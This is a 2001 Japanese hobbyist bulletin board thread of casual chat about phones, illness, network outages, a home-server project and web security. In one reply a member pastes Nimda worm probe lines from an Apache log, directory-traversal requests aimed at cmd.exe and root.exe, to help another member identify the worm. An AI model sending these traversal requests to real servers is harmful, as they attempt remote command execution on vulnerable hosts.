[462へのレス] Re: 携帯何使ってます? 投稿者:SEAWorks 投稿日:2001/11/15(Thu) 15:01:19

雪ぃ〜!雪雪ぃ〜!さすが本州最北端。早いですねぇ〜。
うちとこも昨日はすごぉ〜寒かったのですが、とりあえずポツポツ
雨が降ったり止んだりのお天気でした。さすがに雪はまだ降ってい
ません。でも、まもなく雪も降ることでしょうから、ぼちぼちタイ
ヤ交換の季節ですね。

携帯電話ですか?え〜、いまでも持っておりません。(^^;
無くて不便なのは見知らぬ方たちとの待ち合わせくらいかな。先日
のオフ会で実感してしまいました。

http://www.kisnet.or.jp/to_tera/


[462へのレス] Re: 携帯何使ってます? 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/15(Thu) 17:58:54

携帯は AU です。

いまは ez-web 対応の白黒機ですけど、ez-plus 対応の折りたたみ機種が
でたら、変更しようともくろんでます。

携帯のメール、受信用には使いますけど、あのテンキーで文字を打つのは非常につらいです。
送信は、めったにしないですね。PCから打ってます。

見知らぬ人手も知ったひとでも、待ち合わせやちょっとはぐれちゃったときなどに
すぐに連絡が付くから、すごく便利になりましたね。


[462へのレス] Re: 携帯何使ってます? 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/15(Thu) 21:58:48

同じくAUです。
将来的にこれが使いたくて・・・。
http://www.famitsu.com/entertainment/news/2001/11/12/n05.html

というのは冗談です。
ワタシも携帯メールは受信用ですね。必要があって長文を打つとき、
あまりに面倒なので半角カタカナで全部打っったら笑われちゃいました。


[459] ツッコミ 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 17:01:37

セキュリティホールmemoさんに
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011113_security-tsubo-1

●セキュリティのつぼ(1)
http://www.atmarkit.co.jp/fsecurity/column/sec_hole01/sec01.html

へのツッコミがありました。確かに、この記事の文末にあるような選
択を行おうとすると、使えるソフトウェアがなくなります。
#あ、筆者は「無い」って言っているのかな?(^^;

http://www.kisnet.or.jp/to_tera/


[459へのレス] Re: ツッコミ 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/14(Wed) 16:07:51

この筆者が、実際どんなソフトを使ってるのか、and/or 推奨するのか、もうちっとはっきりしてもらいたいですね。
ただの観念論なら、必要無いっす。

http://usagi.tadaima.com/omori/


[459へのレス] Re: ツッコミ 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/14(Wed) 23:20:41

MS-DOS なら? Ver2000? 以降バージョンアップしていないのでは。
さすがに枯れまくっていて バグは少ないと思われます。

あと、会社にあるシステムの中で安定しているのは
AIX 4.x (IBM RS-6000) でしょうか。
「CADを使う」以外のことをさせていないので、導入以来4〜5年以上
全くトラブルなしです。

●不要な機能を多数備えたシステムは避けた方が無難
●長く使われていて改変のないシステムは比較的安全

これに相当するのでしょうね。導入以来「新しいこと」を全くさせていませんし。


[459へのレス] Re: ツッコミ 投稿者:SEAWorks 投稿日:2001/11/15(Thu) 09:13:47

MS-DOSがセキュリティホールそのものだったりもしますから、あれ
はあれで問題は大きいと思いますが・・・(^^;

> ●長く使われていて改変のないシステムは比較的安全
MSみたいに放置しなければ、比較的安全なシステムは作れそうです
ね。IEも5.5より前のものは更新されないみたいですし。いまでも
4.0や5.0を使っている人がいますけど、今回の6.0では、Windows95
では使えませんから、5.5sp2が最終版になるのかな。5.5は、いつま
でも使われることになると思いますけど、これもいつまでサポートし
てくれるのやら。

http://www.kisnet.or.jp/to_tera/


[461] すいません 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/13(Tue) 23:33:50

突然ですが、盲腸になってしまいました。
今から手術をすることになりました。
出張も一旦中止です。
自宅サーバーも電源を落とします。
とりあえず連絡しておこうと思い、ここに書き込みしておきます。


[461へのレス] Re: すいません 投稿者:田中@艦長 投稿日:2001/11/14(Wed) 00:24:32

あれま、それはまた急なことで。どうかお大事に。
まあ数日で復活できるでしょうけど。


[461へのレス] Re: すいません 投稿者:黒田 (ID: kO8ROyU) 投稿日:2001/11/14(Wed) 01:30:39

あらら、それはそれは。お大事に。
# そんなに出張がイヤでしたか。
全快祝いに備えて、笑わせるネタ仕込んでおかなきゃ。


[461へのレス] Re: すいません 投稿者:何処吹く風 (ID: MXxXadg) 投稿日:2001/11/14(Wed) 02:39:37


》笑わせるネタ仕込んでおかなきゃ。

  へっ。


[461へのレス] Re: すいません 投稿者:みふぃ〜 投稿日:2001/11/14(Wed) 09:06:37

開腹!(゚o゚)
マジック、マジック!!

ところで盲腸って、どのくらい入院するものなんですか?
(知り合いに盲腸になった人がほとんどいないのでマジメな
質問もツッコミもポイントがよくわからないです。)

かめぞ〜さんお大事にー。


[461へのレス] Re: すいません 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/14(Wed) 09:18:18

おぉっ。それは急でしたね。
おだいじに〜


[461へのレス] Re: すいません 投稿者:SEAWorks 投稿日:2001/11/14(Wed) 15:18:22

おろぉ〜。一週間の辛抱ですね。お大事にぃ〜。
#おうちの引渡しで遅くなってしまった(^^ゞ


[461へのレス] Re: すいません 投稿者:かず (ID: lwTVdQ2) 投稿日:2001/11/14(Wed) 20:46:00

今晩は。
盲腸ですか〜、結構これになると大変みたいですね。
最近は、薬で飛ばすことも出来るみたいですが、開くんですね。
余談なんですが、かれこれ10年位前に、兄の友達が、
盲腸で、手術した後に、腹がくっつかなくて、大学を留年したことが有るそうです。
この人は、かなり体格のいい人でした。(贅肉が邪魔したみたいです。)


[461へのレス] Re: すいません 投稿者:ma-take (ID: T/yYz0E) 投稿日:2001/11/15(Thu) 01:54:20

かめぞ〜さーん(;_;)、はやく良くなってくださーい!


[455] またテロ? 投稿者:田中@艦長 投稿日:2001/11/12(Mon) 23:59:25

ニューヨーク市クイーンズ区にA300型機が墜落。
詳細は不明。


[455へのレス] Re: またテロ? 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/13(Tue) 07:35:57

どうやら今回は事故らしいという情報ですね。


[455へのレス] Re: またテロ? 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 08:23:03

日テレは、やけにテロと結び付けたがってたみたいですけどね。(^^;

http://www.kisnet.or.jp/to_tera/


[455へのレス] Re: またテロ? 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 12:30:26

●やはり厳しかったセキュリティ・チェック
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/pc/154138

に限りませんけど、他にも似たようなニュースがたくさんありますけ
ど、いろいろ見ていくと、結局のところ、日ごろアメリカも「平和ボ
ケしてたのね」というのがとてもよく伝わってきます。(^^;

http://www.kisnet.or.jp/to_tera/


[455へのレス] Re: またテロ? 投稿者:何処吹く風 (ID: MXxXadg) 投稿日:2001/11/13(Tue) 21:34:15


 やはり、テロだったので、ミサイルで撃ち落としたため
 事故としか発表できないという風評が立ってまし。


[456] しいたけ 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/13(Tue) 12:13:52

2chネタなのでどうかとは思いますし、ご周知の方もいらっしゃるとは思いますが・・・

http://mizuki.sakura.ne.jp/%7Enagch/upb/file/1005410795.jpg

見れば見るほど・・・(笑)


[456へのレス] Re: しいたけ 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 12:33:11

なるほど。非アクティブ時のモノクロ状態では、しっかりとしいたけ
ですね。(^^;

でも、まんなかにバッテンつけるのって日本だけぢゃないかと思いま
すから、きっと笑えるのは日本人だけですね。

http://www.kisnet.or.jp/to_tera/


[456へのレス] Re: しいたけ 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/13(Tue) 13:16:44

あはははは。しいたけ。
ないす。


[456へのレス] Re: しいたけ 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 16:12:52

これからは、「しいたけ押して!」がスタンダードになります。

http://www.kisnet.or.jp/to_tera/


[456へのレス] Re: しいたけ 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/13(Tue) 18:14:26

たしかに、1週間に5回くらい押すなぁ。しいたけ。


[457] Webメールシステム IMP日本語版 投稿者:やまだ (ID: ApwJyqU) 投稿日:2001/11/13(Tue) 14:19:36

何時だったか..WEBベースのメールクライアントを探されていたような?
http://www.trustbee.com/impjp/

http://www.hori-co.jp/~saba/


[457へのレス] Re: Webメールシステム IMP日本語版 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 16:14:05

あれ?私でしたっけ?
とりあえず、ありがとうございます。(^^;

http://www.kisnet.or.jp/to_tera/


[454] フレッツADSL故障中 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/12(Mon) 18:06:34

うちの地域のみかかのサーバが逝っちゃったらしくって、フレッツADSLが使えないです。19時半頃復旧予定らしい。
仕方ないので、ISDNでつないでます。やっぱり遅い。しくしく。

http://usagi.tadaima.com/omori/


[454へのレス] Re: フレッツADSL故障中 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 18:25:05

う〜、しくしく。そんなことがあると、やっぱりダイナミックドメインでも
サーバー出すのは怖いですねぇ。やっぱり定額接続は常時接続性が保証され
ないから、困ったことになりますね。それにしても天下のNTTさんがこけ
るとは。(^^;


[454へのレス] Re: フレッツADSL故障中 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/12(Mon) 19:01:26

完全に止まっちゃうことってあるんですねぇ。

私のところでは、NTTからの突然切断が2回ほど、Dyn のトラブルが1回。
いずれも瞬断で済みました。IP変わっちゃうので Dyn 更新しないとサーバが使えませんが。(^^;


[454へのレス] Re: フレッツADSL故障中 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/12(Mon) 19:38:37

「んここ」は、今まで2回遭遇。ただ、即復旧。
障害情報を見ても、なにも出てない。
HP更新しました。重大ニュースアリ!!


[454へのレス] Re: フレッツADSL故障中 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 21:26:15

IPは登録変えてもキャッシュがあるので、すぐには変わりませんからね。
これが実はダイナミックDNSの最大のデメリットですよねぇ。(^^;


[453] スクリプト強要する企業サイト一覧 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 16:59:36

スクリプト強要する企業サイト一覧
http://headlines.yahoo.co.jp/hl?a=20011112-00000006-vgb-sci

だそうです。まあ、私自身も毎日インターネットを徘徊しているん
ですけど、普段はスクリプトやらなにやらは全部「オフ」がデフォ
になっているので、たまたま立ち寄ったところでスクリプトを使わ
ないと見られませんみたいな注意が出ると、仕方なく信頼済みに登
録したりしています。

文にもありますけど、そのサイトが絶対に危険性が無いのかと問わ
れると、プライスロトの例にもありますように、一度痛い目にあっ
ても性懲りも無く同じことを繰り返すところもあるわけですし、や
はり、問題は大きいですよねぇ。

で、見られないといえば、リストボックスから選択して見たいペー
ジに移動するというのもスクリプトで、私はぜんぜん使えないわけ
です。ページ上のどこかにハイパーリンクがあればまだしも、それ
すらないところも多くなってきました。セキュリティパッチだとか
アップグレードモジュール、ドライバなどを公開しているサイトで
これをやられてしまって、どうにもならないことも時々あります。

こまった世の中になりましたねぇ。

http://www.kisnet.or.jp/to_tera/


[453へのレス] Re: スクリプト強要する企業サイト一覧 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/12(Mon) 17:54:23

困りもんですよね。
σ(^_^)は会社では徘徊しない(行きつけの所だけ)ので、
もっぱら自宅で徘徊しているのですが、使っているのがDonut Rapt。
セキュリティの切り替えというボタンがあって、切り替えはすぐできます。
便利です。

ただ、安全かどうかの判断はその時点ではできませんよね。
そこで、効果を発揮するのがウイルスチェッカーになります。
σ(^_^)も、実感いたしました。
#少しσ(^_^)サイトで書いてますが・・・

困ったことに、新種に対応する前に食らったらどうしようもない。
もろばの剣とはこの事です。


[453へのレス] Re: スクリプト強要する企業サイト一覧 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 18:22:57

最近はNimda みたいのもあって、昨日っていうか、さっきまで安全だった
サイトに攻撃されちゃうみたいなことがあったりするから、やっぱりスク
リプトがあってもいいけど、無くても正常に使える状態には保ってほしい
ですねぇ。


[452] あどう゛ぁいす 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/12(Mon) 13:16:35

とってもすてきなメールが届きました。

本文
---------------------------------------------------------
Hi! How are you?
I send you this file in order to have your advice
See you later. Thanks
---------------------------------------------------------

もれなくおまけファイル付き。(PIF 420kb)

余計なアドヴァイスなんて いらーーん!


[452へのレス] Re: あどう゛ぁいす 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/12(Mon) 13:59:31

わ〜、すてきなおくりもの♪
ぼくもほし〜・・・わけない!!

あ、そうそう、SEAWorksさん、この掲示板のログを使わせてもらいましたけど、よろしいですか?
#事後確認?
プロジェクト関連。


[452へのレス] Re: あどう゛ぁいす 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 15:12:31

---------------------------------------------------------
今日は!ごきげんいかがですか?
私はあなたの助言にあなたにその後会わせるためにあなたにこのファイルを送ります。
ありがとう
---------------------------------------------------------
from Excite (はぁ〜と)

15M じゃなくってよかったねぇ(^^;

http://www.kisnet.or.jp/to_tera/


[452へのレス] Re: あどう゛ぁいす 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 15:19:33

> この掲示板のログ
インターネットに公開しているものですから、特に制限はありません
けど、何に使われたのですか?

http://www.kisnet.or.jp/to_tera/


[452へのレス] Re: あどう゛ぁいす 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/12(Mon) 15:43:16

>何に使われたのですか?
それは、σ(^_^)のサイトをご覧ください。
#見えるのかな?


[452へのレス] Re: あどう゛ぁいす 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 15:48:23

さっきは気が付きませんでしたが、なるほど。試験結果集計&雑記
ですね。

http://www.kisnet.or.jp/to_tera/


[451] ログにて 投稿者:いぬ (ID: euowarQ) 投稿日:2001/11/12(Mon) 07:21:16

おはようございます。
皆様のお力をお借りして出来上がったサーバで、アパッチのログを見たところ
連続した時間に同じアドレスの方からいっぱいいっぱいアクセスがありました。
いたずらされてるのかしら・・?
なんだか嫌な感じですねぇ。


[451へのレス] Re: ログにて 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/12(Mon) 07:59:21

Nimda というウィルスに感染している IIS サーバからのアクセスです。
サーバに感染したウィルスは、不特定多数のサーバに接続要求を出して、
自分をコピーしようとします。

IIS 以外のサーバでは感染しないので安心ですが、無駄なログが大量にたまりますね。


[451へのレス] Re: ログにて 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 08:33:26

発生当初ほどではなくなりましたけど、相変わらずNimda は多いで
すねぇ。毎月のログ保存のとき、いつもこのアクセスを保存しよう
か消そうか考えこんでしまいます。

http://www.kisnet.or.jp/to_tera/


[451へのレス] なるほど 投稿者:いぬ (ID: euowarQ) 投稿日:2001/11/12(Mon) 09:29:50

これがNimdaのアクセスですか。
だいたい5〜6ぐらい同じIPアドレスからきますね。
気づかないもんでしょうかね・・・
ん?
どこでNimdaと判断すればいいのですか?


[451へのレス] Re: ログにて 投稿者:SEAWorks 投稿日:2001/11/12(Mon) 10:06:25

211.*.*.*- - [12/Nov/2001:07:40:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:53 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:54 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:54 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:55 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:55 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:55 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:56 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:56 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:57 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:57 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:58 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:58 +0900] "GET /scripts/..h5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:58 +0900] "GET /scripts/..h5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:59 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
211.*.*.*- - [12/Nov/2001:07:40:59 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214

こんなのが1セットで届きます。
あとは、相手先のページを見ると、readme.exeを読み込ませるような
ページに書き換えられていたりします。

一応、トレンドマイクロの対策ページ。
http://www.trendmicro.co.jp/nimda/
ここにいろいろ情報がありますので、参考にしてみてください。

http://www.kisnet.or.jp/to_tera/


[451へのレス] Re: ログにて 投稿者:いぬ (ID: euowarQ) 投稿日:2001/11/12(Mon) 10:27:51

ええ、こんな感じでした・・・
今日は早く帰れる日なので、帰ったら早速チェックだ!


[450] Y!BB サーバ設置プロジェクト 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/09(Fri) 09:57:14

旧スレが長くなったので 新スレに移行。

かめぞ〜氏 自宅サーバ設置プロジェクト
http://kamezoh.servemp3.com/
http://kamezoh.servemp3.com:88/

FTPサーバも立ててね。よろしく。 >かめぞ〜さん
ftp://guest@kamezoh.servmp3.com/
passwd "guest"


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:SEAWorks 投稿日:2001/11/09(Fri) 10:08:20

でたぁ〜!ぺっぱ〜さんの悪魔のささやき・・・

http://www.kisnet.or.jp/to_tera/


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:かず (ID: lwTVdQ2) 投稿日:2001/11/09(Fri) 17:42:14

こんばんは、かずです。
今回は、80、88 共に見ることが出来ます。

フッレツISDN → across


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/09(Fri) 17:58:29

いつのまにかプロジェクトになってる。(笑)

>悪魔のささやき・・・
に乗ってもいいんですが、2K標準のFTPサーバーってIIS使うんですよね。
それはイヤ!!
んで、フリーの「たいに〜FTPで〜もん」と「くいっくFTP」を試してみてるのですが、よくわからない・・・?
FTPの知識についてはまだ欠落しているので、もう少しかかりそうです。
なにかわかりやすい解説サイトでもあれば教えてください。
#ちなみに時々更新してます。

もしなんでしたら、このプロジェクトはおしえて掲示板で進行してもいいかな?


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:やまだ (ID: ApwJyqU) 投稿日:2001/11/09(Fri) 19:56:24

Y!BB サーバ設置プロジェクト
http://www.hori-co.jp/~kamezou/

http://www.hori-co.jp/~saba/


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/09(Fri) 20:00:42

やった〜 独立掲示板!


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:SEAWorks 投稿日:2001/11/09(Fri) 20:51:50

わぁ〜いわぁ〜い・・・
<ぼそ>あ、ネタがひとつ減った</ぼそ>

経過がおもろいから、そっちにも行きます。


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/09(Fri) 22:11:59

なんか、さっきからネットの調子がおかしい。
BBだけの問題かどうかわかんない。
見えないサイトがいっぱい。
ここもさっきまで見えなかった。


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:やまだ (ID: ApwJyqU) 投稿日:2001/11/09(Fri) 22:14:13

そうだね..かめぞ〜さんとこも見えなかったよ。

http://www.hori-co.jp/~saba/


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:SEAWorks 投稿日:2001/11/09(Fri) 22:17:54

うちとこからは、両方見えましたよぉ〜?


[450へのレス] Re: Y!BB サーバ設置プロジェクト 投稿者:やまだ (ID: ApwJyqU) 投稿日:2001/11/09(Fri) 22:26:05

今は見えてるぅ 先程までいろんな所が繋がらなかった様子 #σ(^_^)かも

http://www.hori-co.jp/~saba/


[449] ここに書き込む様な事でもないのですが・・・ 投稿者:かず (ID: lwTVdQ2) 投稿日:2001/11/09(Fri) 09:55:32

おはようございます。
SEAWorks様
>う〜ん、おいら雇われボーカルだったからこれといって・・・(^^;
>コピーしてたのはラフィンノーズとか暴威とかスタークラブとかス
>ターリンとか・・・かなり濃い。

いや〜 なんかうれしっくてついつい、書き込んでしまいました。
実は、自分もここいら大好き人間でして、今でもたまに聞いてます。
若い頃に、聴いていた音楽は、やっぱり、今聞いても、いいものです。(自分だけかも)
基本的には、音楽は、何でも好きですけど。

それでは。
こんな事で、書き込んでしまいまして、申し訳ございません。


[449へのレス] Re: ここはいどばたですので(^^; 投稿者:SEAWorks 投稿日:2001/11/09(Fri) 10:07:04

実は、それほど聞き込んではいないんですよ。練習曲として、ピック
アップしたいくつかの曲くらいしか知らないんです。唯一ラフィンの
アルバムをひとつ持っている程度かな。(^^;

http://www.kisnet.or.jp/to_tera/


[448] Niigata-Toshin Electric Co.,ltd. 投稿者:黒田 (ID: kO8ROyU) 投稿日:2001/11/08(Thu) 23:15:01

2001.11.07 SEAWorks Network!25万アクセス達成!
2001.10.31 会社案内のページ更新
2001.05.15 横浜東信電気リンク追加
2000.10.31 SEAWorks Network!10万アクセス達成!

更新まだかなぁ?
会社の10倍のアクセスかぁ。すごい。


[448へのレス] Re: Niigata-Toshin Electric Co.,ltd. 投稿者:SEAWorks 投稿日:2001/11/09(Fri) 08:25:03

元々は、ここのトップが会社のページなんですけどねぇ。
わけたとたん、アクセス数に格差ができてしまって、どうしたも
のかと・・・。これもデジタルデバイド?<違うって。(^^;

http://www.kisnet.or.jp/to_tera/


[447] おしえての 48000 ゲットしちゃいました 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/08(Thu) 16:50:41

ただ、それだけ。

http://usagi.tadaima.com/omori/


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:SEAWorks 投稿日:2001/11/08(Thu) 17:07:00

やられた。狙ってたのにぃ〜。(T-T)

http://www.kisnet.or.jp/to_tera/


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/08(Thu) 17:12:08

ワロタ


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/08(Thu) 18:12:48

キリ番ネタは 初めてみた〜よ


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:SEAWorks 投稿日:2001/11/08(Thu) 18:23:05

ここだけ2ch化してる。(^^;


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/08(Thu) 20:20:38

というわけで、age(w


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:SEAWorks 投稿日:2001/11/08(Thu) 21:51:04

ふーん


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/08(Thu) 23:48:45

=========終了===========

それとも

「名スレの予感・・・」

どっちだろう?


[447へのレス] Re: おしえての 48000 ゲットしちゃいました 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/09(Fri) 01:20:04

=========再開===========
少なくとも、後者ではないと思ふ。

というわけで
=========終了===========